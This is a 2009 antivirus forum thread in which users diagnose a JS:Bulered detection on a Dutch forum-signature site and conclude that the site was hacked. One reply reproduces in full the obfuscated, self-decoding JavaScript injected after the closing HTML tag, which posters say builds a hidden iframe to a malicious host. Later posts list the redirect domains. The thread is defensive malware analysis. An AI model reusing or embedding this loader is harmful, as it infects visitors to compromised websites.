

Title: JS:Bulered
Post by: Filter on July 19, 2009, 03:07:45 PM
Hello, recently I've been getting a warning about a trojan called JS:Bulered from avast on the following site wXw.forumticker.nl (switch the X to w to visit). Could anyone tell me if that's true and maybe where the trojan is and how that works? It's a dutch site, but it's not supposed to be a malicious site(I know who runs the site). That site provides ticker signatures for forums, and those also trigger the same warning from avast since recently. Is the site hacked or something?
Title: Re: JS:Bulered
Post by: YoKenny on July 19, 2009, 03:34:00 PM
Welcome Filter.

There is a lot of site hacking going on and avast! is alert to this:
http://blog.avast.com/2009/06/25/chameleon_redirectors 
Title: Re: JS:Bulered
Post by: Filter on July 19, 2009, 03:38:03 PM
Thanks YoKenny.

Could anyone tell me if that's also the case with wXw.forumticker.nl? Unfortunately I'm not knowledgeable enough to look further into this matter, but I'd really appreciate it if anyone else could. Since that site distributes forum signatures, the possible trojan could reach a large number of people through forums. I'd really appreciate anyone who could help explain the issue with this site. I frequent a forum where a lot of people use these signatures, which is my main reason for wanting to know.
Title: Re: JS:Bulered
Post by: .: L' arc :. on July 19, 2009, 04:00:55 PM
 Suspicious script outside <html></html> tag:

<script>var cmgXz350="48czR30c";var eKI9C="Bj75bBj";var R3Op="ar RI47nZ='UJ";var pTchT="gwvgwvg4gwv";var FiZ7SH="J%63UJ%7";var tzKXYUV="gBgwvg78gwvg48g";var DNZ5x="wvg%VeVgwvgwvg9";var A7vxjJ5="Bj52bBj75bBj";var OUHK="v327%Lpzv33B';";var IY2f="%30UJ%2CaUJ%";var AQ75A="s').replace(/";var bRvy0F="9czR3B';";var qI8x="g,'3')));";var tQkox="%3DUJ%2";var xOaJ="vgwvg9";var GTmm="UJ%68UJ%65UJ";var fgit5sYv="69bBj76bBj20bB";pTchT=xOaJ+"gwvgwvg%VeV"+pTchT;var JF5Ylpr="Bj79bBjvEbBj27";var ph25="zR61czR74czR65";var FfMZlw="vgwvg9g";var PpuAu="R64czR6Fc";var pftS="(/wvg/g";var YuJz57="ce(/%6Cj/g,'8";var dh4e8H6="%6CUJ%79UJ%65UJ";var ila7q6d8="J%68UJ%74U";var OkdgH0M="/g,'J%').";FfMZlw="27gwvgwvg8gw"+FfMZlw;var Wj2n="val(unescap";var XwZUnTP5="CaUJ%6BUJ%";var CLkG="4bBj6FbBj6v";var TGoPTi="28bBj52b";var ohM4="bBj52bBj7";var gUlHG="jvCbBj2FbB";var IlM39V="vgwvggwv";var evE0CX="eval(unes";var hXjPG="J%31UJ%27U";bRvy0F="R27czR2"+bRvy0F;dh4e8H6="65UJ%72UJ%66UJ"+dh4e8H6;FiZ7SH+="4UJ%2CaUJ%6";var rLxmX="u7Ea='%Lpzv";var gK2N="wvg2Egwvg73gwvg";YuJz57+="%')));var";var FFlA="(/UJ%/";var JIMDg5Cy="%3AUJ%2FUJ%2FU";var bqZZ="20czR64czR";ila7q6d8+="J%3DUJ%27";var fu59K8D="bBj6Cb";var NvmwGebn="vg74gwvgwvg%Ve";var cNlfN9="75czR6DczR65cz";var wW4pliDx="pzv330";var oeQZJl="jv6bBj";GTmm="8UJ%30UJ%2Ca"+GTmm;YuJz57+=" O2fGgt='gwvgwv";IY2f="J%78UJ%48UJ"+IY2f;var hg8eSQ="wvg78gw";var Q3sDJ="UJ%3BUJ%64U";pTchT="wvgwvg8gw"+pTchT;qI8x+="var EyD";IY2f=Q3sDJ+"J%6CaUJ%6BU"+IY2f;var YwKq="UJ%72UJ%";YuJz57+="g4gwvgw";IY2f="0UJ%27"+IY2f;var ExYZZuY="%74UJ%2CaUJ%";var eSUlC5o="9bBjvDbBjvDbBj";var XghOg="BjvCbBj2FbB";pTchT+="g28gwvgwvg4g";hg8eSQ+="vg48gwvg30gwvg";ExYZZuY="UJ%73UJ"+ExYZZuY;var JCgckOv="j61bBj45bBj69";var hEL8FEus="j52bBj58bB";AQ75A="%Lpz/g,'"+AQ75A;YuJz57=".repla"+YuJz57;oeQZJl="j57bBj58bBj59bB"+oeQZJl;Wj2n="jvB';e"+Wj2n;YwKq="%2FUJ%54"+YwKq;XghOg=oeQZJl+"27bBjvEb"+XghOg;var DfiJdZ="Bj64bBj6FbBj6v";var 
djiboxsc="74czR28czR27c";hXjPG+="J%3BUJ%64UJ%6";eKI9C+="6DbBj65bBj6Eb";XghOg+="j64bBj69bBj76bB";OUHK="9%Lpzv364%Lpz"+OUHK;tzKXYUV=YuJz57+"vgEgwvgwv"+tzKXYUV;var UhR984pb="aUJ%73U";gK2N+="74gwvg79gwvg";var bfF2RD9="j69bBj4";var CX2nyL="zR2EczR63c";hEL8FEus="72bBj20bBj7vbB"+hEL8FEus;CX2nyL=cNlfN9+"R6EczR74c"+CX2nyL;tzKXYUV=AQ75A+"sv3/g,'%')"+tzKXYUV;var BqVI="6/g,'%'))";var plLb2zuC="7gwvg3Bgw";gK2N=tzKXYUV+"wvg30g"+gK2N;var wOans="replac";DNZ5x="vg2gwvgwvg9gwvg"+DNZ5x;CX2nyL=PpuAu+"zR63czR"+CX2nyL;XghOg+="jvEbBj22bBjvBb";wW4pliDx="7%Lpzv362%L"+wW4pliDx;hEL8FEus+="j6EbBj74bB";var LL5EWZ="Egwvgwvg";var hXysc="g70gwvgwvg5";pftS+=",'6').replace";tQkox+="7UJ%68UJ%74UJ%7";GTmm="J%78UJ%4"+GTmm;var b5FN="vggwvgwvg9gwvg";JCgckOv+="bBj4DbB";Wj2n+="e(CDbc.";var TUvxJqc="v32E%Lpzv36E%";OkdgH0M+="replace(/bBJ%/";var K3sAx="74bBj65";DNZ5x+="gwvg74g";var HjKmEu6="5bBj74b";wOans+="e(/Ca/";var J8asNu="2czR61czR6Dc";evE0CX=hg8eSQ+"29gwvg3B';"+evE0CX;bRvy0F=J8asNu+"zR65cz"+bRvy0F;FiZ7SH=dh4e8H6+"%66UJ%66UJ%65U"+FiZ7SH;var daHjW="var CDbc='";var es0I="zR65czR6DczR";var O5pPNLZ="7%Lpzv37A%Lp";tQkox=UhR984pb+"J%72UJ%63UJ"+tQkox;DfiJdZ="bBj4FbBjvDb"+DfiJdZ;OkdgH0M=Wj2n+"replace(/j"+OkdgH0M;JCgckOv="bBj75bBj4BbB"+JCgckOv;evE0CX="EgwvgwvgBg"+evE0CX;CX2nyL=cmgXz350+"zR3Dcz"+CX2nyL;DfiJdZ=hEL8FEus+"j6CbBj66"+DfiJdZ;hXysc+="gwvgwvgEgwvgwvg";evE0CX+="cape(O2fGgt.";bfF2RD9+="DbBj29bBj";JIMDg5Cy=tQkox+"4UJ%70UJ"+JIMDg5Cy;ExYZZuY+="62UJ%75UJ%";var q3OrnGt="5bBj69bBj4";var tAS7="bBj69bBj4DbBjv";CLkG="27bBjvBbBj6"+CLkG;bRvy0F+="eval(unesca";bRvy0F+="pe(EyDa0e.rep";HjKmEu6+="Bj45bBj6";var T1rscS="'C').re";var TTXPmh2="J%3B';";BqVI=T1rscS+"place(/g"+BqVI;es0I=ph25+"czR45czR6Cc"+es0I;FfMZlw+="wvgwvg4gw";var ztNhGCn0="58bBj59bBj";HjKmEu6+="CbBj65bBj6DbBj";var iWA5="Bj74bBj42bB";CLkG="j79bBjvEbBj"+CLkG;ohM4=fu59K8D+"Bj6CbBj29"+ohM4;bRvy0F+="lace(/";XghOg+="Bj69bBj66bBj28b";var 
P7YpX6H="bBj6EbBj74bBj";FFlA=wOans+"g,'E').replace"+FFlA;eSUlC5o="2bBj6FbBj64bBj7"+eSUlC5o;FfMZlw+="vgwvg4gw";TTXPmh2=ila7q6d8+"UJ%31UJ%27U"+TTXPmh2;eSUlC5o=eKI9C+"Bj74bBj2EbBj6"+eSUlC5o;OUHK+="eval(unescape(t";O5pPNLZ="v33D%Lpzv32"+O5pPNLZ;hXysc=LL5EWZ+"1gwvg70gwv"+hXysc;XghOg="0bBj55bB"+XghOg;var Y70o="UJ%64UJ%74UJ%68";P7YpX6H+="2EbBj77";bRvy0F=djiboxsc+"zR69czR66czR7"+bRvy0F;plLb2zuC+="vg73gwvg52gwv";FFlA+="g,'%')));";DNZ5x=b5FN+"73gwvgwvg9gwvgw"+DNZ5x;ztNhGCn0="5bBj57bBj"+ztNhGCn0;plLb2zuC="vgEgwvg2"+plLb2zuC;TTXPmh2=GTmm+"%69UJ%67U"+TTXPmh2;var IRD2NJ="bBj28bBj27b";evE0CX=pTchT+"wvgwvg"+evE0CX;OUHK="79%Lpzv35"+OUHK;gK2N=OUHK+"pu7Ea.replace(/"+gK2N;TUvxJqc+="Lpzv361%Lpzv36";iWA5=HjKmEu6+"65bBj6Eb"+iWA5;FfMZlw=DNZ5x+"wvg79gwvg3Dgwvg"+FfMZlw;JIMDg5Cy="30UJ%2C"+JIMDg5Cy;fgit5sYv="j64bBj"+fgit5sYv;YwKq=FiZ7SH+"7UJ%73UJ"+YwKq;IRD2NJ=iWA5+"j79bBj49bBj64"+IRD2NJ;q3OrnGt=ohM4+"5bBj4BbBj61bBj4"+q3OrnGt;es0I=CX2nyL+"zR72czR65c"+es0I;gK2N+="wvg%VeVgwvgwvg5";es0I=bqZZ+"6EczR6BczR78czR"+es0I;TTXPmh2+="eval(unescape";JIMDg5Cy=XwZUnTP5+"78UJ%48UJ%"+JIMDg5Cy;TGoPTi+="Bj75bBj4Bb";JF5Ylpr="bBj6FbBj64b"+JF5Ylpr;var 
XQlU="zv36Cj4%L";K3sAx=P7YpX6H+"bBj72bBj69bBj"+K3sAx;q3OrnGt+="DbBjvDbBj27b";CLkG=gUlHG+"j62bBj6FbBj64bB"+CLkG;IlM39V=NvmwGebn+"Vgwvgw"+IlM39V;ExYZZuY=JIMDg5Cy+"J%65UJ%78UJ%69"+ExYZZuY;YwKq=ExYZZuY+"74UJ%74UJ%"+YwKq;IRD2NJ="2EbBj67bBj6"+IRD2NJ;plLb2zuC=FfMZlw+"vgwvg5gwvgw"+plLb2zuC;O5pPNLZ=TUvxJqc+"D%Lpzv365%Lpz"+O5pPNLZ;A7vxjJ5="61bBj72bBj20b"+A7vxjJ5;eSUlC5o=XghOg+"Bj64bBj6FbBj6vb"+eSUlC5o;XQlU="zv36B%Lpzv37%Lp"+XQlU;ztNhGCn0=IRD2NJ+"Bj70bBj5"+ztNhGCn0;tAS7=A7vxjJ5+"4BbBj61bBj45"+tAS7;bRvy0F=es0I+"65czR6EczR"+bRvy0F;OkdgH0M+="g,'%').repl";O5pPNLZ=XQlU+"pzv36Cj30%Lpz"+O5pPNLZ;JCgckOv=JF5Ylpr+"bBj2BbBj52"+JCgckOv;qI8x=OkdgH0M+"ace(/v/"+qI8x;q3OrnGt=eSUlC5o+"6EbBj75"+q3OrnGt;BqVI+=");";YwKq=R3Op+"%64UJ%6"+YwKq;ztNhGCn0="65bBj6EbBj74bBj"+ztNhGCn0;YwKq=bRvy0F+"czR/g,'%')));v"+YwKq;pftS=evE0CX+"replace"+pftS;IY2f=YwKq+"6FUJ%7"+IY2f;fgit5sYv=tAS7+"DbBj22bBjvCbB"+fgit5sYv;IlM39V=plLb2zuC+"g58gwvgwvgEgw"+IlM39V;IlM39V=gK2N+"gwvg2Egwvg7w"+IlM39V;bfF2RD9=TGoPTi+"Bj61bBj45bB"+bfF2RD9;hXysc=IlM39V+"g4Fgwvg2"+hXysc;qI8x=ztNhGCn0+"v6bBj27bBj29bB"+qI8x;q3OrnGt="BjvDbBj27bBj7"+q3OrnGt;hXysc=wW4pliDx+"%Lpzv339%Lpzv3"+hXysc;JCgckOv=q3OrnGt+"BjvCbBj62"+JCgckOv;O5pPNLZ=rLxmX+"364%Lpzv36E%Lp"+O5pPNLZ;Y70o=IY2f+"77UJ%69"+Y70o;TTXPmh2=hXjPG+"CaUJ%6BU"+TTXPmh2;JCgckOv=fgit5sYv+"j69bBj64b"+JCgckOv;TTXPmh2=Y70o+"UJ%3DUJ%27U"+TTXPmh2;CLkG=JCgckOv+"j2BbBj27bB"+CLkG;hXysc=O5pPNLZ+"zv37%Lpzv36Cj5"+hXysc;hXysc=FFlA+"var tp"+hXysc;K3sAx=CLkG+"bBj75bBj6DbBj65"+K3sAx;DfiJdZ=bfF2RD9+"vBbBj76bBj61bBj"+DfiJdZ;BqVI=pftS+"(/%VeV/g,"+BqVI;hXysc=TTXPmh2+"(RI47nZ."+hXysc;qI8x=DfiJdZ+"bBj75bBj6DbBj"+qI8x;qI8x=K3sAx+"bBj20bBj"+qI8x;qI8x=daHjW+"bBj76bBj"+qI8x;qI8x+="a0e='czR76czR";hXysc=qI8x+"61czR72czR"+hXysc;BqVI=hXysc+"4gwvg43g"+BqVI;eval(BqVI);</script><script>check_content()</script>
Title: Re: JS:Bulered
Post by: Filter on July 19, 2009, 04:54:11 PM
Thanks! So that is probably the actual problem?
If I contact the owner of that site, what would I need to tell him?
Is it just that script that is the problem or also how the script got on there?
Title: Re: JS:Bulered
Post by: DavidR on July 19, 2009, 05:53:18 PM
- This is commonly down to old content management software being vulnerable; see this example of a host's response to a hacked site.
Quote
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains.  We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

1. check all index pages for any signs of java script injected into their coding. On windows servers check any "default.aspx" or
"default.cfm" pages as those are popular targets too.

2. Remove any "rogue" files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account-wide
changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

3. Check all .htaccess files, as hackers like to load re-directs into them.

4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
"strong" password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.


Also see Tips for Cleaning & Securing Your Website: http://www.stopbadware.org/home/security

Title: Re: JS:Bulered
Post by: Filter on July 19, 2009, 07:52:42 PM
Thanks DavidR, it's not my site though, but thanks :)

Did you check the site wXw.forumticker.nl? I'd like another opinion on it, because the moderator on that forum claims it's a false positive because his nod32 doesn't find anything. Already told him avast has a better web shield, but I'd like a second opinion on it.

Title: Re: JS:Bulered
Post by: spg SCOTT on July 19, 2009, 08:14:05 PM
Hi Filter,

As .: L' arc :. already said, there is a suspicious script outside the html block (right at the bottom, after the closing html tags).
This is wrong and should not be there.

You could advise the webmaster of this thread, tell them to look at the source code themselves, and show them this link:

http://www.UnmaskParasites.com/security-report/?page=www.forumticker.nl

-Scott-
Title: Re: JS:Bulered
Post by: DavidR on July 19, 2009, 08:15:57 PM
It is most certainly hacked; there are very few AVs even looking for this, much less able to detect it, and avast is all over them like a rash.

There is a huge block of obfuscated javascript after the closing html tag, a standards no-no, so it is highly unlikely that it is there by design.

This script tag is all on a very long single line, see image, I have broken it down to give a better idea of what it looks like.
Title: Re: JS:Bulered
Post by: Lisandro on July 19, 2009, 08:29:03 PM
Need another opinion?
Seems an infected script as posted by .: L' arc :.
Title: Re: JS:Bulered
Post by: polonus on July 19, 2009, 08:46:44 PM
Ha filter,

Ja dit is een groeiend probleem, software of script op websites die kwetsbaar blijken voor exploits.
Wellicht een oudere versie van Joomla daar. De web-admins zijn er niet al te alert op en merken niet dat ze hun gebruikers via hun browser bezoekjes besmetten. Een ander voorbeeldje van een dergelijke besmetting: http://forum.avast.com/index.php?topic=46176.0
Het weghalen van de malcode helpt niet zomaar, de kwetsbaarheid die de hackers toegang verschafte moet verdwijnen, dat kan een PHP kwetsbaarheid zijn, zoals hier een oudere versie van gebruikte website software of oude meuk waar de webadmin niet van weet dat het exploitable is, ook de hoster dient zijn gebruikers te beschermen tegen deze massale hacks,

groetjes,

polonus
Title: Re: JS:Bulered
Post by: Filter on July 19, 2009, 09:11:27 PM
Thanks everybody for your swift help :) I have passed on all the information you provided me, should be more than enough! So, thanks again.

@ Polonus:

Bedankt, toevallig had ik dat topic al gelezen, vond het al erg veel gelijkenis tonen met dit geval. Ik denk dat dit ook zeker een geval is van verouderde software. Ik was vooral verbaasd dat ik de enige ben die het opmerkte door avast. Ik gebruik avast al zo lang zonder problemen dat ik bijna zou vergeten wat voor troep vele andere mensen gebruiken, hehe.
Title: Re: JS:Bulered
Post by: DavidR on July 19, 2009, 09:28:04 PM
You're welcome, good luck.
Title: Re: JS:Bulered
Post by: Filter on July 20, 2009, 12:57:20 PM
Apparently, he put that code there himself :-\
He says in that code is all the information that goes into the ticker signatures.

But just the strange placement of that code shouldn't set off avast though? Or does it and is it a false positive?
Title: Re: JS:Bulered
Post by: .: L' arc :. on July 20, 2009, 01:21:57 PM
Apparently, he put that code there himself :-\
He says in that code is all the information that goes into the ticker signatures.

But just the strange placement of that code shouldn't set off avast though? Or does it and is it a false positive?

 I guess it won't easily be set as a false positive; the location of the script is different from what it should be.

 Sophos detected the said script as an infection too.

 http://www.virustotal.com/analisis/eb76a862b807bdec69a5e4e85062121dd523103ac35142cccf910bbf66170dbe-1248088861
Title: Re: JS:Bulered
Post by: Filter on July 20, 2009, 01:38:34 PM
Sophos detects it as suspicious behaviour but not so much as an infection, probably because of the wrong placement.
The code is in the wrong place, but that only seems to be because he doesn't have enough knowledge on where to put it.
Still feel that on itself shouldn't be enough to set off avast for a trojan though? Ahh well.
Title: Re: JS:Bulered
Post by: jsejtko on July 20, 2009, 02:23:40 PM
Apparently, he put that code there himself :-\
He says in that code is all the information that goes into the ticker signatures.

But just the strange placement of that code shouldn't set off avast though? Or does it and is it a false positive?

This is not a false positive!! I'm pretty sure he's not the creator of this script - it is an infection. After unpacking that huge script (3 layers) you will see an iframe creation with a malicious target url.

If he says that the code contains some info, then I ask what info? There is just one malicious iframe.

Regards
Title: Re: JS:Bulered
Post by: spg SCOTT on July 20, 2009, 03:23:51 PM
Apparently, he put that code there himself :-\
He says in that code is all the information that goes into the ticker signatures.

BS

I'm sorry but there is NO reason to put ANY code outside of the html tags, and obfuscate it too
That spells disaster, even before it is actually malicious, which incidentally it is.

Is he looking at the source code at all, let alone the right part ???

Quote
But just the strange placement of that code shouldn't set off avast though? Or does it and is it a false positive?
Correct me if I'm wrong, but avast is not alerting to the strange placement; it is alerting to the actual content, which jsejtko has explained.

-Scott-
Title: Re: JS:Bulered
Post by: .: L' arc :. on July 20, 2009, 03:36:17 PM
 No reason to bash, but I believe it is on the website author's side where the move must be made [modify the source code] rather than avast marking it as a false positive.

 avast has no fault of the script being placed outside the <html></html> tag.
Title: Re: JS:Bulered
Post by: Filter on July 20, 2009, 03:54:56 PM
The way he handled it yesterday didn't make sense to me in the first place. He just brushed it off, seemed like he had no idea what I was talking about. I agree it's his move though, but I'm not giving up this easily :P Other cases on this forum concerning JS:Bulered were exactly the same as this one. Thanks again guys for the help, I appreciate it  :) I've passed on the info that you provided, jsejtko, thanks. I think he's probably talking about another script or something.
Title: Re: JS:Bulered
Post by: spg SCOTT on July 20, 2009, 03:58:40 PM
The way he handled it yesterday didn't make sense to me in the first place. He just brushed it off, seemed like he had no idea what I was talking about.
Yes, this is a common reaction to this - the 'I know better than you because I run a website' attitude

Title: Re: JS:Bulered
Post by: Filter on July 20, 2009, 04:34:03 PM
Or maybe he really has no clue. Anyway, another forum member with avast has the same issue and posted a link to this thread, so maybe he'll get any wiser from this discussion here.
Title: Re: JS:Bulered
Post by: spg SCOTT on July 20, 2009, 04:39:08 PM
...so maybe he'll get any wiser from this discussion here.

We can only hope...;)
Title: Re: JS:Bulered
Post by: DavidR on July 20, 2009, 05:19:56 PM
Apparently, he put that code there himself :-\
He says in that code is all the information that goes into the ticker signatures.

But just the strange placement of that code shouldn't set off avast though? Or does it and is it a false positive?

I have to wonder why they are obfuscating javascript (what do they have to hide?), which is essentially a plain-language scripting tool; sticking it outside the html tags just adds to that suspicion.

@ .: L' arc :.
One of the problems in this is when sending it to VT, there are very few of those scanners that are even looking for this type of thing.
Title: Re: JS:Bulered
Post by: Lisandro on July 20, 2009, 08:30:36 PM
One of the problems in this is when sending it to VT, there are very few of those scanners that are even looking for this type of thing.
Fully agree with David. The reality is that avast is behind any other competitor in this meaning.
Title: Re: JS:Bulered
Post by: polonus on July 20, 2009, 08:51:52 PM
Hi Tech, DavidR and Filter,

I had WEPAWET analyze the site: wXw.forumticker.nl
Results: http://wepawet.iseclab.org/view.php?hash=81df9d5d82e0346347bd3bdb4eed0ebd&t=1248116104&type=js

pol
Title: Re: JS:Bulered
Post by: Lisandro on July 20, 2009, 09:00:30 PM
I had WEPAWET analyze the site
Thanks Polonus, but it's too technical for me... I wish a clear information: infected or not. I think average user will think the same.
Title: Re: JS:Bulered
Post by: DavidR on July 20, 2009, 09:01:40 PM
One of the problems in this is when sending it to VT, there are very few of those scanners that are even looking for this type of thing.
Fully agree with David. The reality is that avast is behind any other competitor in this meaning.

Don't you mean avast is 'ahead' of other competitors as they aren't even checking.
Title: Re: JS:Bulered
Post by: polonus on July 20, 2009, 09:28:23 PM
Hi DavidR and Tech,

Well, you can read it yourself: the analysis says "suspicious", and sites with suspicious code should be blocked whether or not they actually redirect to a silent malware download host. The websites in question should be cleansed of this "Unfug", to use an appropriate German word. That is my two cents on the matter of suspicious code found in webpages....
In most cases the code is malcode or could be abused and this can be established from analyzing at www.unmaskparasites.com via their security report or the malicious iFrames checked against the Bad Stuff Detektor or the site checked against Wepawet-alpha url scanner or blacklistdoctor.com
Use a bookmarklet like this one to show hidden js on a page:
javascript:(function(){var%20i,f,j,e,div,label,ne;%20for(i=0;f=document.forms[i];++i)for(j=0;e=f[j];++j)if(e.type=="hidden"){%20D=document;%20function%20C(t){return%20D.createElement(t);}%20function%20A(a,b){a.appendChild(b);}%20div=C("div");%20label=C("label");%20A(div,%20label);%20A(label,%20D.createTextNode(e.name%20+%20":%20"));%20e.parentNode.insertBefore(div,%20e);%20e.parentNode.removeChild(e);%20ne=C("input");/*for%20ie*/%20ne.type="text";%20ne.value=e.value;%20A(label,%20ne);%20label.style.MozOpacity=".6";%20--j;/*for%20moz*/}})() "Good for you analyzers to keep an eye on the sparrow!"
Yes good forum friends, we are in the top league in this respect, avast is leader here, so polonus is also out in the trenches and I put all we have found over recent months in long threads at InformAction Forums where each an every malcode script is discussed in length with the protection of NoScript in mind, re: http://forums.informaction.com/viewtopic.php?f=8&t=1028
(my nick is luntrus there). Keep on the look-out, folks, and keep your shields up, avast knights,

polonus
Title: Re: JS:Bulered
Post by: Filter on July 20, 2009, 09:32:36 PM
Hi Tech, DavidR and Filter,

I had WEPAWET analyze the site: wXw.forumticker.nl
Results: http://wepawet.iseclab.org/view.php?hash=81df9d5d82e0346347bd3bdb4eed0ebd&t=1248116104&type=js

pol
Could you or anyone else maybe explain that report?
The only things I can find that seem off is the url redirects at the bottom: hXtp://exist.butterflyeffect.gs/Trop and hXtp://ipot.applepie.gd/privatezone/?d6fb367bf8c5480228703541f761eb18
Both those sites are blocked by Google and thus can be seen as malicious?
Title: Re: JS:Bulered
Post by: DavidR on July 20, 2009, 09:53:28 PM
The problem with obfuscated javascript is that it isn't easy to see what is being done, much less whether it is redirecting and to where, as the image example of the code on that page that I posted earlier shows.

I have no tools to be able to do any analysis (I, like the others trying to help, am just an avast user like yourself), but given the link polonus gave (in the quoted text) you can do as you have done and look up the domains, and as you have found they are considered malicious. So there is a likelihood that avast too finds these malicious and effectively alerts to block access.
Title: Re: JS:Bulered
Post by: polonus on July 20, 2009, 09:55:58 PM
Hi Filter,

Yep, good observation, this is what google has to say about exist dot butterflyeffect dot gs and that was "De vorige keer dat verdachte inhoud op deze site werd aangetroffen (last time suspicious content was found), was op (was on) 2009-07-20. Malicious software includes 96 scripting exploit(s). This site was hosted on 1 network(s) including AS31103 (Keyweb AG).
The other one: ipot dot applepie dot gd forward slash privatezone Last time suspicious content was found on this site was on 2009-07-20
De vorige keer dat verdachte inhoud op deze site werd aangetroffen, was op 2009-07-20.
Malicious software includes 754 scripting exploit(s).
This site was hosted on 2 network(s) including AS41062 (PRO100), AS22576 (LAYER3).
Deze site heeft in de afgelopen 90 dagen schadelijke software gehost. Deze software heeft 361 domein(en) geïnfecteerd, waaronder xvediox.com/, flashost.com.br/, coralhillsresort.com/.
This site has been hosting malcode during the last 90-day period. This software has infected 361 domains, e.g.:  xvediox.com/, flashost.com.br/, coralhillsresort.com/.
Just delving a little into this and you see what we come up with. Easy answers won't do, confront them with this - what does the obfuscated code do on that web page?

polonus
Title: Re: JS:Bulered
Post by: Filter on July 20, 2009, 10:02:04 PM
Thanks, both of you. This should be more than enough evidence.  ;)

Have to say that I came to understand a lot more about JS:Bulered ;D
Title: Re: JS:Bulered
Post by: DavidR on July 20, 2009, 10:13:43 PM
You're welcome, good luck.
Title: Re: JS:Bulered
Post by: polonus on July 20, 2009, 10:16:50 PM
Ha Filter,

Het genoegen was wederzijds, wij leren hier ook weer van. Je begrijpt dat dit recentelijk steeds belangrijker aan het worden is omdat CyberCrook & Co het nu via deze listigheidjes voorzien heeft op de betrouwbare kleinere websites, die hier niet zo op verdacht zijn. Avast heeft hier speerpunt technologie en de avast schilden werken goed. Ook is het altijd verstandig een browser met script blocker te gebruiken, ik zweer bij Firefox met NoScript. NoScript is nog geen enkele keer verslagen als je de malcode maar niet whitelist en daarom is het besmetten van normaliter betrouwbare veilige sites zo'n gevaarlijke zaak. Welkom op onze forums, blijf hier komen met je vragen en blijf ons inspireren. Ik wens je veiligheid online en blijf malware vrij,

polonus aka Damiaan
Title: Re: JS:Bulered
Post by: Filter on July 20, 2009, 10:25:16 PM
Bedankt. Ben al heel lang blij met Avast :) Ik blijf hier zeker rondhangen!
Title: Re: JS:Bulered
Post by: scurrminator on August 04, 2009, 08:57:26 PM
hello guys,

i am having the same issue, my site is getting hacked again and again. i always remove the same malicious code from my phpbb3, coppermine, wordpress and the static web pages one by one, but it's there again after a day or two. contacted my webhosting company but they don't have any solution. my avast antivirus used to tell me that i have some JS:Bulered virus in my pages but i used to ignore it till i started getting this on my website hXXp://www.intcube.com, though my cpanel was never hacked and i am still able to use it. saw a few posts in the avast forums and some others as well, but no one knows about the exact nature of this malware

Quote
http://www.hackthissite.org/forums/viewtopic.php?f=29&t=3849!
http://forum.avast.com/index.php?topic=46176.0
http://forum.avast.com/index.php?topic=46919.0

(http://img200.imageshack.us/img200/4717/89926055.jpg)

after going through google advisory pages, i changed my password after cleaning pages from various computers but whenever i would logon my pages would again be infected with the code mentioned above, google says

(http://img200.imageshack.us/img200/1382/80631694.jpg)

i checked lemonia.ws google advisory pages and it clearly shows that its the source of virus,

(http://img4.imageshack.us/img4/3883/65765763.jpg)

in june there was nothing regarding js:bulered malware in google search, but now we're having alot of forums where people are discussing this, think its spreading more and more and may be some one would help us too, can any one suggest what should i do?
Title: Re: JS:Bulered
Post by: Lisandro on August 04, 2009, 09:07:34 PM
Please do not post the same thing twice; it just doubles the effort of helping.
Follow http://forum.avast.com/index.php?topic=46176.0;topicseen